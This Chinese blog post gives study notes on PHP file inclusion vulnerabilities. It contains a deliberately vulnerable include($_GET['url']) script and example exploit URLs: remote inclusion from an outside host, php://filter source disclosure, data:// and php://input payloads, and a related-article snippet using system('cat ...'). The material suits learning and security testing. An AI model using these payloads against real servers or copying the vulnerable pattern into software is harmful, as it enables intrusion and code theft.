文件包含漏洞(include)-学习笔记

最新推荐文章于 2023-08-15 20:15:28 发布
最新推荐文章于 2023-08-15 20:15:28 发布
阅读量5.8k 收藏 16
点赞数 4
分类专栏: 安全实践
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lilongsy/article/details/108146107
版权

简介

服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当PHP来执行,这会为开发者节省大量的时间。这意味着您可以创建供所有网页引用的标准页眉或菜单文件。当页眉需要更新时,您只更新一个包含文件就可以了,或者当您向网站添加一张新页面时,仅仅需要修改一下菜单文件(而不是更新所有网页中的链接)。

PHP Stream(流)

属性支持
受限于 allow_url_fopenNO
受限于allow_url_include仅 php://input、 php://stdin、 php://memory 和 php://temp。
允许读取仅 php://stdin、 php://input、 php://fd、 php://memory 和 php://temp。
允许写入仅 php://stdout、 php://stderr、 php://output、 php://fd、 php://memory 和 php://temp。
允许追加仅 php://stdout、 php://stderr、 php://output、 php://fd、 php://memory 和 php://temp(等于写入)
允许同时读写仅 php://fd、 php://memory 和 php://temp。
支持 stat()仅 php://memory 和 php://temp。
支持 unlink()No
支持 rename()No
支持 mkdir()No
支持 rmdir()No
仅仅支持 stream_select()php://stdin、 php://stdout、 php://stderr、 php://fd 和 php://temp。

PHP文件包含漏洞

分类

LFI(Local File Inclusion)

本地文件包含漏洞,顾名思义,指的是能打开并包含本地文件的漏洞。大部分情况下遇到的文件包含漏
洞都是LFI。简单的测试用例如前所示。

RFI(Remote File Inclusion)

远程文件包含漏洞。是指能够包含远程服务器上的文件并执行。由于远程服务器的文件是我们可控的,
因此漏洞一旦存在危害性会很大。
但RFI的利用条件较为苛刻,需要php.ini中进行配置

allow_url_fopen = On
allow_url_include = On

两个配置选项均需要为On,才能远程包含文件成功。

php:// — 访问各个输入/输出流(I/O streams)
php中引发文件包含漏洞的通常是
以下四个函数:

  • include()
  • include_once()
  • require()
  • require_once()

举例

解析txt

include可以包含文件,如txt文本格式,并把包含的文件当作php代码解析执行。

test.php

<?php
include "1.txt";

1.txt:

<?php
phpinfo();

1

<?php
include $_GET['url'];

包含服务器文件

访问:http://xx/test.php?url=1.txt跟上面一样。
配置:

allow_url_fopen = On
allow_url_include = On

访问:http://test/test.php?url=http://www.baidu.com
test

包含本地文件

访问:http://test/test.php?url=file:///D:/test/1.txt
利用条件:php版本大于等于php5.3.0phar://

test.php?file=phar://test.zip/phpinfo.txtzip://	
test.php?file=zip://D:\phpStudy\WWW\fileinclude\test.zip%23phpinfo.txt

test
访问:http://test/test.php?url=http://v.f5.ink/i
http://v.f5.ink/i下载的文本内容为:

include # F5.ink
<?PHP
phpinfo();
?>

远程

发送post请求php://input

post

火狐浏览器插件hackbar:
https://addons.mozilla.org/en-US/firefox/addon/max-hackbar/?src=search

读取php代码:

php://filter/read=convert.base64-encode/resource=test.php
访问:http://test/test.php?url=php://filter/read=convert.base64-encode/resource=test.php
不受allow_url_include限制
base64解密:

echo "PD9waHANCmluY2x1ZGUgJF9HRVRbJ3VybCddOw0KPz4=" | base64 -d

data base64

http://test/test.php?url=data:text/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b
http://test/test.php?url=data:text/plain,%3C?php%20phpinfo();?%3E

利用条件:php版本大于等于php5.2、allow_url_fopen = Onallow_url_include = On
1
图片也一样
http://tool.chinaz.com/tools/imgtobase/

参考

http://f5.ink:50001/index.php

小龙在山东
关注
  • 4
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Linux程序设计-学习笔记.doc
11-29
本文是一份 Linux 程序设计学习笔记,涵盖了 Linux 的基本概念、Linux 程序的类型、环境变量、C 语言编译器、开发系统导引、头文件、库文件等知识点。 一、Linux 基本概念 Linux 是一个类 UNIX 内核的可以自由发布...
PHP文件包含漏洞原理分析和利用方法
hzcyclone的专栏
04-20 840
PHP文件包含漏洞原理分析和利用方法 PHP文件包含漏洞PHP网站开发中常见的漏洞形式, 主要是由于对包含函数应用不当、代码书写习惯不当等造成的。本文将从包含漏洞产生的原理到防御方法入手,详细解析php文件包含漏洞。 一、涉及到的危险函数〔include(),require()和include_once(),require_once()〕 1 include()
web漏洞-文件包含漏洞
rumil的博客
05-19 248
文件包含。在PHP中,可以通过文件包含函数动态加载本地或者远程的另一个文件,把其中的代码当成PHP代码进行解析执行。在网站开发中,通过包含数据库配置文件,就不用每个需要查询数据库的PHP文件都写一次数据库连接信息,通过包含foot.php和head.php等网站头部和尾部模板文件,课快速开发出版面相似的页面,后期维护修改更加容易。
ctfshow web4
hintll的博客
06-11 683
利用文件包含实现木马注入
4、DVWA:file include (文件包含漏洞)
qq_44598397的博客
09-25 1150
4、file include (文件包含漏洞) File Inclusion,意思是文件包含漏洞),是指当服务器开启allow_url_include选项时,就可以通过php的某些特性函数(include(),require()和include_once(),require_once())利用url去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。文件包...
CTFshow web3 菜鸡刷题记录
qq_43039823的博客
07-21 2289
打开题目发现整个界面只有一句话,F12查看源码之后无果, 根据这个格式 <?php include($_GET['url']);?> 后想到可能会存在文件包含漏洞。 因为常见的导致文件包含漏洞的函数有:“PHPinclude(), include_once(), require(), require_once()等”, 因为开发人员往往都希望代码相对灵活,所以会将()被包含的文件设置为变量从而实现灵活的调动,但这也导致了从客户端可以调用一个恶意文件导致包含漏洞。 既然已经有所...
ctfshow web(日志注入&简单回显盲注&&with rollup注入绕过)
weixin_63231007的博客
05-25 1066
web3 <?php include($_GET['url']);?> php伪协议的标志。没有提示我们flag在哪个文件,filter试一下flag.php,flag,txt,flag都没有 用php://input试一下,burp抓包 发现了ctf_go_go_go,应该就是我们的flag文件。 post 传入 <?php system('cat ctf_go_go_go'); ?> cat一下,得到flag。 web4 include()函数包含的文件会被
ctfshow命令执行
qq_45951598的博客
02-06 1387
文章目录WEB29 做题前先看看 命令执行小技巧 命令执行绕过总结 WEB29 error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } 方法一: 模糊搜索 payload:?c=system(‘cat f*’); 解法二: 了
PHP文件包含漏洞
Jim的博客
08-17 1300
PHP文件包含可以直接执行包含文件的代码,包含的文件格式是不受限制的。 文件包含分为本地文本包含(local file include)和远程文件包含(remote file include文件包含函数有:include(),include_once(),require()和require_once() 1.本地文件包含是指只能包含本机文件的包含漏洞,大多出现在模块加载,模板加载和ca
ctfshow web 1-14
yzl_007的博客
09-30 991
web1-20 web1-20web1web2web3web4web5月饼杯web签到持续更新。。。。。 web1 签到题,打开查看源码,base64解码得到flag web2 题目提示:最简单的sql sqlmap一把嗦 详细的使用可以查看这个:https://blog.csdn.net/yzl_007/article/details/119974367 web3 打开是一段代码, <?php include($_GET['url']);?> 文件包含函数,容易造成文件包含漏洞,输入
file-include-webpack-plugin:一个webpack插件,用于在html文件中使用@@ include语法包含文件,例如gulp-file-include
02-03
文件包含Webpack插件 一个webpack插件,用于在html文件中使用@@include语法@@include文件,例如gulp-file-include 。 安装 npm install --save-dev file-include-webpack-plugin 注意:此插件需要Webpack 4.0.0及更...
文件包含原理解释-require
最新发布
05-13
不恰当的文件包含可能导致远程文件包含漏洞(RFI,Remote File Inclusion),攻击者可以通过构造恶意URL来包含远程服务器上的文件,甚至执行任意代码。因此,我们应该始终确保包含的文件路径是可信的,并避免用户...
Linux驱动之设备树-学习笔记
07-31
2. **DTSI (Device Tree Source Include)**:通用设备树源码,用于包含多个DTS文件,以实现代码重用。 3. **DTB (Device Tree Blob)**:设备树二进制文件,是编译后的DTS文件,内核加载时使用此文件解析硬件配置。 4...
webpack-merge-and-include-globally:合并多个文件(js,css ..)并“按原样”运行以包含它们。 支持通过自定义转换和通配符路径进行缩小
05-01
分别包含所有文件,从而达到与您相同的效果。 入门 npm install --save-dev webpack-merge-and-include-globally 用法 假设您想使诸如jquery , moment (包括3种语言)和toastr在全球范围内可用,而您正在努力通过...
PHP伪协议与文件包含漏洞
z1moq的博客
08-26 321
文件包含漏洞 为了更好的使用代码的复用性,可以使用文件包含函数将文件包含进来,直接使用文件中的代码。但这就产生了文件包含漏洞,产生原因实在通过 PHP 的函数引入文件时,为了灵活包含文件会将被包含文件设置为变量,通过动态变量来引入需要包含的文件。此时如果用户对变量可控,二服务器端卫队变量进行合理的校验或者校验被绕过,就会导致文件包含漏洞 文件包含所用的函数 函数 功能 include() 代码执行到 include() 函数时将执行文件中的 PHP代码 include_once() 当重
ctf.show 通关秘籍
qq_37970270的博客
09-13 1419
@ CTF.show 1.web签到题 访问web签到题的地址,发现页面只有"where is flag"字样 使用Fn+F12进入调试模式,或者页面空白处点击右键查看网页源代码,发现页面中有一段英文字符串被注释了,根据编码规则猜测使用的是base64的加密方式。 使用解码平台尝试解码,示例使用站长之家,成功获取到flag。(url:http://tool.chinaz.com/tools/base64.aspx) ...
PHP文件包含漏洞总结
坚持硬核
10-07 3371
首先,我们学习两个函数:require(string) include(string)这两个函数的作用是相同的, 就是将一个文件的内容包含在其所在的php代码中。 例如:我们写了一个1.txt文件放在服务器上,其内容为:<?php phpinfo()?> 当我们去请求这个页面的时候,自然而然,页面会原封不动的将这句话显示出来,那么有什么骚姿势可以让这句话作为php代码被解析呢? 嘿...
网络安全——文件包含漏洞
weixin_54055099的博客
09-24 1752
文件包含漏洞的原理
CTFshow的Web题目wp(持续更新)
苦行僧的妖孽日常
08-15 578
CTFshow的Web题目wp(持续更新)
nutika --include-package和--include-module的区别
07-11
在使用 CSDN 开发的 ChitGPT 中,`--include-package` 和 `--include-module` 是用于指定加载自定义包和模块的命令行参数。 - `--include-package` 参数用于指定要加载的自定义包。当你的对话模型需要调用自定义的 Python 包时,可以使用该参数将包包含到模型中。这样,在对话过程中,模型就能够访问和使用这些自定义包中的功能。 - `--include-module` 参数用于指定要加载的自定义模块。与包不同,模块是指单个 Python 文件或者一个文件夹中的 Python 文件集合。通过使用该参数,你可以将自定义的模块加载到对话模型中,使其能够调用其中的函数或者类。 这两个参数都是为了在对话模型中添加额外的自定义功能而设计的,可以根据需要选择使用其中之一或者同时使用。通过将自定义包和模块包含到模型中,你可以扩展对话模型的能力,使其能够处理更多的任务和功能。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小龙在山东

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值